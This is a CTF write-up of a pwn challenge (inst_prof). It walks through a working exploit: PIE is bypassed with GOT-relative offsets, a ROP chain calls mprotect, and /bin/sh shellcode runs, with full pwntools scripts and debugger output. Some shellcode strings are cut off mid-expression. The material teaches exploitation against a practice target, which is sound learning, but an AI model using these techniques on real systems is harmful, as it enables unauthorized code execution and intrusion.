The first plan I pitched was that of performing a ret2libc-type exploit where we simply called libc's system function with /bin/bash as the target. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system, and making a small ROP chain to jump to this function.

When we started down this road, it became apparent that there were some formidible obstacles in our way. Mainly the PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect was being called set in. And so Plan B took form.

Plan B

Once we realized that mprotect was called by the make_page_executable function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.

In theory.

We ruled out the page allocated by alloc_page since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable, however we were unsuccessful (attributing the lack of success to some "unknown" feature of NX, whereas I'd learn later that we were specifying an unaligned address to mprotect) It was at this point that we called it a night and I went to bed dreaming of armored assembly.

The Next Day

After sleeping on it, I solidified the plan as follows:

1) Find writable region of memory
    a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
3) Set up call to `mprotect` through the `make_page_executable` call
    a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

Reflecting upon the previous days' work, I realized that I needed region of memory that was always writable, and which would always be at a constant offset within the .text section.

I originally performed all of the following work on a writable section located just above (visually; lower memory address) the page allocated by alloc_page and got it working reliably on my local machine. However after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, however I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but substituting the GOT section as my target rather than the failed one.

The Global Offset Table remained writable (due to only parital RELRO) and was part of the contiguous section of memory mapped with the .text section. And fortunately there was a reference to the .text section located at the top of the stack each time we entered the loop-executable section:

[0x562e80db3b16]> pd 2
            ;-- rip:
            0x562e80db3b16 b    ffd3           call rbx
            0x562e80db3b18      0f31           rdtsc
[0x562e80db3b16]> ds; pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            0x7fa9a763e000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7fa9a763e005      90             nop
        |   0x7fa9a763e006      90             nop
        |   0x7fa9a763e007      90             nop
        |   0x7fa9a763e008      90             nop
        |   0x7fa9a763e009      83e901         sub ecx, 1
        `=< 0x7fa9a763e00c      75f7           jne 0x7fa9a763e005
            0x7fa9a763e00e      c3             ret
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18                       .;...V..

Notice in the highlighted lines that the instruction address after call rbx is at the top of the stack in our loop executable section

This is in fact the return address within do_test pushed by the call rbx instruction. To check that this return address was a constant offset from the Global Offset Table, I simply subtracted the return addresss from the GOT address, and re-ran the executable:

[0x7fa9a763e000]> iS~got
idx=22 vaddr=0x562e80fb4fd8 paddr=0x00001fd8 sz=40 vsz=40 perm=--rw- name=.got
idx=23 vaddr=0x562e80fb5000 paddr=0x00002000 sz=112 vsz=112 perm=--rw- name=.got.plt
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18                       .;...V..
[0x7fa9a763e000]> ? section..got.plt - [rsp]
2102504 0x2014e8 010012350 2M 20000:04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504.0 2102504.000000f 2102504.000000

The iS command is the information on Sections command, which displays addresses of the different sections mapped by the process.

The ? command is used to perform math operations and returns the answer in a wide variety of formats.

The ~ character appended to any command will filter the output much like grep does.

I saw that the GOT address was exactly 0x2014e8 past the return address. Closing and re-opening the program did not change this; however PIE did ensure that the text section's base address was randomized on each execution (save for the last 12 bits). As long as I only used offsets relative to the text section address (provided as a return address from our looped section) then PIE (and ASLR) wouldn't do much to mitigate my efforts.

Seeing from our earlier dm output above of the memory map that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.

And So ROP Begins...

The next challenge was how I'd get the address into the r15 register. I knew I could simply load the address from rsp using mov r15, [rsp], which was a 4 byte instruction. But then I'd need to add to it the offset 0x2014e8 to get our GOT address.

My first thought was to simply use the inc r15 command several (hundred) times, but even utilizing the 0x1000 loops, it would take 0x2014e8 / 0x1000 == 513 calls to the loop to increment it enough times. Instead, I used the loop counter itself (rsi == 0x1000) as a starting value and doubled it 9 times to get the value into another placeholder register. This is where the exploit script started to take form, and here were the first few lines:

#!/usr/bin/env python2

from pwn import *

#open the process
p = process("./inst_prof")

#print program prompt

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6\xc3") #add r14, r14

Note that for both the add instrucions that the last byte is 0xc3, which is the ret instruction; this shortcuts the loop letting the addition take place exactly 1 time.

To generate the assembled bytes for these instructions I used the rasm2 binary (which comes with radare2) with the keystone assembler: rasm2 -ax86.ks -b64 "add r14, r14". To install keystone assembler, use r2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone from a terminal prompt.

It was here I decided to test the script. To do so I added the import from IPython import embed, and added embed() to the script. This allowed me to pause execution (at any place within the script) and attach the r2 debugger to the running process to inspect its state. I simply ran the script with ./solver.py, and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2:

-> % r2 -d 14198
[0x7f30b1ae4360]> dr r13; dr r14; dr r15

And lo and behold, I had my text section reference as well as the start of my offset calculation in r13 and r14 respectively.

To get the rest of the offset into the r14 register, I added a few more lines to the script to add 0x1000, 0x246 * 2, and finally increment 0x5c more times to get the desired value:

#add another 0x1000 to r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde\xc3") #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6\xc3") #inc r14

I'd noticed every time entering the loop section that the r11 register was set to 0x246, which I added to the offset in the highlighted line above

At this point I should have both the text section address in r13, as well as the offset needed to reference the GOT in r14. To test, I added the following line to my script to add r14 to r13:

p.send("\x4d\x01\xf5\xc3") #add r13, r14

Then ran ./solver.py and attached with r2:

[0x7fb876853360]> dr r13; dr r14; dr r15
[0x7fb876853360]> ? section..got.plt
94056963182592 0x558b57e11000 02530552770210000 87597.4G b57e1000:0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592.0 94056965210112.000000f 94056963182592.000000

Success! I had successfully calculated the offset from the loop section's return address to the start of the GOT, and loaded it into one of our scratch registers.

Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:

[0x7fb876853360]> pxq @ section..got.plt
0x558b57e11000  0x0000000000201e08  0x00007fb876d3d0f0   .. ........v....
0x558b57e11010  0x00007fb876b2e5f0  0x00007fb8768533b0   ...v.....3.v....
0x558b57e11020  0x00007fb87685ca50  0x0000558b57c0f7d6   P..v.......W.U..
0x558b57e11030  0x00007fb876853350  0x00007fb876795420   P3.v.... Tyv....
0x558b57e11040  0x0000558b57c0f806  0x00007fb87685cb20   ...W.U.. ..v....
0x558b57e11050  0x00007fb87685cb50  0x0000558b57c0f836   P..v....6..W.U..
0x558b57e11060  0x0000558b57c0f846  0x0000558b57c0f856   F..W.U..V..W.U..
0x558b57e11070  0x0000000000000000  0x0000558b57e11078   ........x..W.U..
0x558b57e11080  0x0000000000000000  0x0000000000000000   ................
0x558b57e11090  0x0000000000000000  0x0000000000000000   ................
0x558b57e110a0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110b0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110c0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110d0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110e0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110f0  0x0000000000000000  0x0000000000000000   ................

I selected the address on the highlighted line, which was 0xa0 past the GOT start. Since I'd learned that mprotect would only work on addresses that were multiples of 0x1000, I kept the GOT address in r13 for use in the ROP chain that I was planning to construct.

Second Stack

Now that I had reference to a writable region of memory, I set r15 to point 0xa0 pass the GOT where I'd place all my data for the exploit, including the shellcode and the ROP chain.

First I set r14 to 0xa0:

p.send("\x4d\x31\xf6" + ret) #xor r14, r14

for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

It was here that I'd decided that I'd want a way to distinguish easily the 3 and 4 byte instructions, so I refactored all the instructions with ret bytes to instead append a ret variable where ret == '0xc3'

Then set r15 to r13 + r14:

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13

#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

Since my plan was to use r15 as the cursor into the second stack, I set r14 to this address:

p.send("\x4d\x89\xfe" + ret) #mov r14, r15

I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr() function and directive to my solver script. This is what it looked like at that point:

#!/usr/bin/env python2

from pwn import *

ret = "\xc3"

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:

        p.send(writeCmd + b)
        p.send(incCmd + ret)

#open the process
p = process("./inst_prof")

#print program prompt

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6" + ret) #add r14, r14

#add another 0x1000 to r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde" + ret) #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6" + ret) #inc r14

p.send("\x4d\x01\xf5" + ret) #add r13, r14

p.send("\x4d\x31\xf6" + ret) #xor r14, r14

for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13

#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15

#write shellcode to second stack
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68' + \

And I launched it so I could inspect with r2 to see if everything was in working order:

-> % r2 -d 5703
[0x7f5463e3c360]> dr r13; dr r14; dr r15
[0x7f5463e3c360]> pxq 0x30 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289   H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853   n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f   .PWH...;........

Excellent. We can see that r13 holds our GOT reference, while r14 points to the top of our second stack, and r15 points just past the last byte written (05 from my shellcode).

By this point I'd solved problems 1 and 2:

1) Find writable region of memory
    a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory

And now had steps 3 and 4 left:

3) Set up call to `mprotect` through the `make_page_executable` call
    a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

To Call or Not to Call

Having looked at the call to make_page_executable from before, we saw that the first argument to mprotect is passed as an argument to make_page_executable in the rdi register. Therefore I needed to find a pop rdi gadget that I'd call prior to calling make_page_executable in the ROP chain.

Fortunately, r2 has a handy ROP search tool:

[0x7f5464323000]> s main
[0x558ef8a53860]> dr r13; dr r14; dr r15
[0x558ef8a53860]> /R/ pop rdi
  0x558ef8a53bc3                 5f  pop rdi
  0x558ef8a53bc4                 c3  ret

[0x558ef8a53860]> pxq 8 @ rsp
0x7ffcaacd0eb8  0x0000558ef8a53b18                       .;...U..
[0x558ef8a53860]> ? 0x558ef8a53bc3 - [rsp]
171 0xab 0253 171 0000:00ab 171 "\xab" 10101011 171.0 171.000000f 171.000000

/R/ allows searching for ROP gadgets using a regular expression

In the first highlighted line above, I use the gadget search tool to find a pop rdi gadget, and then calculate it's offset from the return address in [rsp], showing that the gadget is 0xab past the return address.

At this point I needed an additional qword of scratch space to work with, so I incremented my shellcode address by +8, leaving r14 pointing to a spare word on my second stack, to which I wrote the GOT address to. With this code change my current state of registers + seconds stack went from :

r13 == GOT address
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == shellcode


r13 == scratch
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == GOT address
[r14+8] == shellcode

Or to illustrate with radare, it went from:

[0x558ef8a53860]> dr r13; dr r14; dr r15
[0x558ef8a53860]> pxq 0x40 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289   H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853   n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f   .PWH...;........
0x558ef8c550d0  0x0000000000000000  0x0000000000000000   ................


[0x55eefe549b16]> dr r13; dr r14; dr r15
[0x55eefe549b16]> pxq 0x40 @ r14
0x55eefe74b0a0  0x000055eefe74b000  0x4850ec8948c03148   ..t..U..H1.H..PH
0x55eefe74b0b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x55eefe74b0c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x55eefe74b0d0  0x000000000000050f  0x0000000000000000   ................

Now that the GOT address was saved at [r14], this freed up r13 to do some more offset calculation needed for the pop rdi gadget I found.

I simply needed [rsp] + 0xab to start my rop chain, which I accomplished via:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
    p.send("\x49\xff\xc5" + ret) #inc r13

#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret)    #mov [r15], r13

r15 now holds the start of our rop chain, which is the pop rdi gadget's address. Since ROP depends fully on the state of the rsp register (and the memory region it points to), we have to make sure that the pop rdi gadget will pop the correct value into rdi, which needs to be the argument we want to supply to make_page_executable, namely the page-aligned address of the GOT we want to mark as executable.

So I load this from our previously saved location at r14 into r13, and write that to our second stack plus 8:

p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08")    #mov [r15+8], r13

At this point, our second stack looks like this (logically):

+------------------------+ ;r14
|       GOT address      |     
|                        |
|        Shellcode       |
|                        |
+------------------------+ ;r15
|      pop rdi gadget    |
|       GOT address      |

And with radare2:

[0x55ba1eb91b16]> dr r13; dr r14; dr r15
[0x55ba1eb91b16]> pxq 0x40 @ r14
0x55ba1ed930a0  0x000055ba1ed93000  0x4850ec8948c03148   .0...U..H1.H..PH
0x55ba1ed930b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x55ba1ed930c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x55ba1ed930d0  0x55ba1eb91bc3050f  0x55ba1ed930000000   .......U...0...U
[0x55ba1eb91b16]> pxq 0x20 @ r15
0x55ba1ed930d2  0x000055ba1eb91bc3  0x000055ba1ed93000   .....U...0...U..
0x55ba1ed930e2  0x0000000000000000  0x0000000000000000   ................
[0x55ba1eb91b16]> pd 2 @ [r15]
            0x55ba1eb91bc3      5f             pop rdi
            0x55ba1eb91bc4      c3             ret

note that the value in r15 is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the first pxq output at r14, which is why I repeat the pxq at the r15 register, where the pop rdi gadget and GOT address are more easily seen and recognized.

All that's left is to add the mprotect call and our shellcode address to the ROP chain.

To do that, we have to calculate the offset from [rsp] to make_page_executable:

[0x7f88cc42b000]> ? sym.make_page_executable - [rsp]
-248 0xffffffffffffff08 01777777777777777777410 17179869184.0G fffff000:0f08 -248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 -248.0 -248.000000f -248.000000
[0x7f88cc42b000]> ? [rsp] - sym.make_page_executable
248 0xf8 0370 248 0000:00f8 248 "\xf8" 11111000 248.0 248.000000f 248.000000

Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8 to get the call to make_page_executable:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
    p.send("\x49\xff\xcd" + ret) #dec r13

And then add this to our ROP chain:

p.send("\x4d\x89\x6f\x10")    #mov [r15+0x10], r13

Now the second stack + rop chain looks like this:

+--------------------------------+ ;r14
|           GOT address          |     
|                                |
|            Shellcode           |
|                                |
+--------------------------------+ ;r15
|          pop rdi gadget        |
|           GOT address          |
|    make_page_executable gadget |

We simply need to get our shellcode address at the end of this rop chain, and then set rsp to the start of our rop chain.

    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15

    #advance pointer 3 qwords
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14

I had originally tried mov [r15+0x18], [r14+0x8], however it turns out you can't do two dereferences in a single mov instruction, so I ended up removing (unnecessarily) both dereferences by splitting the instruction into two explicit movs. I could have avoided working with the second stack pointer (through r13) and simply mov [r15+0x18], r14, however at the time I didn't notice this.

Now the second stack should be set up like so:

|           GOT address          |     
+--------------------------------+ ;r14
|                                |
|            Shellcode           |
|                                |
+--------------------------------+ ;r15
|          pop rdi gadget        |
|           GOT address          |
|    make_page_executable gadget |
+--------------------------------+ ;r13
|       <shellcode address>      |

And we verify:

[0x7f0e471a5000]> dr r13; dr r14; dr r15
[0x7f0e471a5000]> pxq 0x60 @ r14 - 0x8
0x56103a1800a0  0x000056103a180000  0x4850ec8948c03148   ...:.V..H1.H..PH
0x56103a1800b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x56103a1800c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x56103a1800d0  0x561039f7ebc3050f  0x56103a1800000000   .....9.V.....:.V
0x56103a1800e0  0x561039f7ea200000  0x56103a1800a80000   .. ..9.V.....:.V
0x56103a1800f0  0x0000000000000000  0x0000000000000000   ................
[0x7f0e471a5000]> pxq 0x30 @ r15
0x56103a1800d2  0x0000561039f7ebc3  0x000056103a180000   ...9.V.....:.V..
0x56103a1800e2  0x0000561039f7ea20  0x000056103a1800a8    ..9.V.....:.V..
0x56103a1800f2  0x0000000000000000  0x0000000000000000   ................
[0x7f0e471a5000]> pd 2 @ [r15]
            0x561039f7ebc3      5f             pop rdi
            0x561039f7ebc4      c3             ret
[0x7f0e471a5000]> pd 6 @ [r15 + 0x10]
        |   ;-- make_page_executable:
        |   0x561039f7ea20      55             push rbp
        |   0x561039f7ea21      ba05000000     mov edx, 5
        |   0x561039f7ea26      be00100000     mov esi, 0x1000         ; rsi
        |   0x561039f7ea2b      4889e5         mov rbp, rsp
        |   0x561039f7ea2e      5d             pop rbp
        `=< 0x561039f7ea2f      e9ecfdffff     jmp sym.imp.mprotect
[0x7f0e471a5000]> pd 16 @ [r15 + 0x18]
            ;-- r14:
            0x56103a1800a8      4831c0         xor rax, rax
            0x56103a1800ab      4889ec         mov rsp, rbp
            0x56103a1800ae      50             push rax
            0x56103a1800af      4889e2         mov rdx, rsp
            0x56103a1800b2      48bbff2f6269.  movabs rbx, 0x68732f6e69622fff
            0x56103a1800bc      48c1eb08       shr rbx, 8
            0x56103a1800c0      53             push rbx
            0x56103a1800c1      4889e7         mov rdi, rsp
            0x56103a1800c4      50             push rax
            0x56103a1800c5      52             push rdx
            0x56103a1800c6      4889e2         mov rdx, rsp
            0x56103a1800c9      50             push rax
            0x56103a1800ca      57             push rdi
            0x56103a1800cb      4889e6         mov rsi, rsp
            0x56103a1800ce      b03b           mov al, 0x3b            ; ';' ; 59
            0x56103a1800d0      0f05           syscall

I use the pd commands above to illustrate that each address (save for the GOT address) at r15 points to the appropriate address in the executable for our ROP chain

The last pd at [r15 + 0x18] shows my disassembled shellcode. I had to update my shellcode for this challenge to set rsp to point back at the original stack space stored in rbp (highlighted above) because the GOT was no longer marked as writable (which the stack needs to be, since I used push instructions in my shellcode).

All that's left is to load our rop chain address in r15 into rsp, and watch it rain shell:

p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret

At this point I tested locally, getting a shell locally, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.

The Sweet, Sweet Solution

I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.

Something I found interesting about the solution for this challenge is that unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the r12 register to leak data (albeit in a slightly obfuscated manner) with the subsequent call to write() that the program made.

Also, I now know that pwntools has an asm() function that will simplify my life in the future ;)

#!/usr/bin/env python2
from pwn import *
from time import sleep
from IPython import embed

ret = "\xc3"
testing = True

if testing:
    p = process("./inst_prof")
    #p = remote("", 9090)
    p = remote("inst-prof.ctfcompetition.com", 1337)
    #context.timeout = 0.2

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:

        p.send(writeCmd + b)
        p.send(incCmd + ret)

def shiftR15Qword():
    for x in range(8):
        p.send("\x49\xff\xc7\xc3") #inc r15

def main():
    #read inital output:

    #now program is waiting for our 4 bytes
    #first we create our "2nd stack" where we'll store our ROP

    #get text section reference:
    p.send("\x4c\x8b\x2c\x24")  #mov r13, [rsp]

    #constant offset from text.seg.ref to GOT:
    #[rsp] + 0x2014e8 == GOT
    #go 0xa0 further than that to get to blank section
    #total == [rsp] + 0x2014e8 + 0xa0 == 0x201588
    #get offset into r14 (r14 is 0 right now):
    p.send("\x49\x01\xf6" + ret) #add r14, rsi #rsi == 0x1000
    #now double r14 9 times:
    for x in range(0x9):
        p.send("\x4d\x01\xf6" + ret) #add r14, r14
    #now r14 is 0x200000, add another 0x1000:
    p.send("\x49\x01\xf6" + ret) #add r14, rsi

    #0x588 left
    #r11 seems to be 0x246 all the time....
    for x in range(2):
        p.send("\x4d\x01\xde" + ret) #add r14, r11

    #0x5c + 0xa0 left:
    for x in range(0x5c):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now we have GOT Address, save it:
    p.send("\x4d\x01\xf5" + ret) #add r13, r14
    #clear r14:
    p.send("\x4d\x31\xf6" + ret) #xor r14, r14

    for x in range(0xa0):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now copy to r15:
    p.send("\x4d\x89\xef" + ret) #mov r15, r13

    #now add r15, r14:
    p.send("\x4d\x01\xf7" + ret) #add r15, r14

    #save second stack pointer
    p.send("\x4d\x89\xfe" + ret) #mov r14, r15

    #get r15 past our saved text section ref

    #now lets write our shellcode:
    writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f' + \
        '\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52' + \

    #save GOT address at [r14]:
    p.send("\x4d\x89\x2e" + ret) #mov [r14], r13

    #now we need pop rdi gadget
    #pop rdi == [rsp] + 0xab
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xab):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #save pop addr on rop stack:
    p.send("\x4d\x89\x2f" + ret)    #mov [r15], r13

    #save addr of region to be mprotected as 1st rop gadget arg:
    p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
    p.send("\x4d\x89\x6f\x08")    #mov [r15+8], r13

    #now we need to call mprotect and jump to shellcode:
    #mprotect is [rsp] - 0xf8
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xf8):
        p.send("\x49\xff\xcd" + ret) #dec r13

    #push mprotect gadget:
    p.send("\x4d\x89\x6f\x10")    #mov [r15+0x10], r13

    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15
    #advance pointer 3 words
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14

    #now we set rsp == r15 and let it "rip"..heh
    p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret


if __name__ == "__main__":

And here is what it looked like running it:

-> % ./solver.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
initializing prof...ready

[*] Switching to interactive mode
...<redacted lots of bytes>...
$ ls
$ cat flag.txt
$ exit
[*] Got EOF while reading in interactive


Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.

Of course I wouldn't be able to do this with out the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.

Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.

Until next time!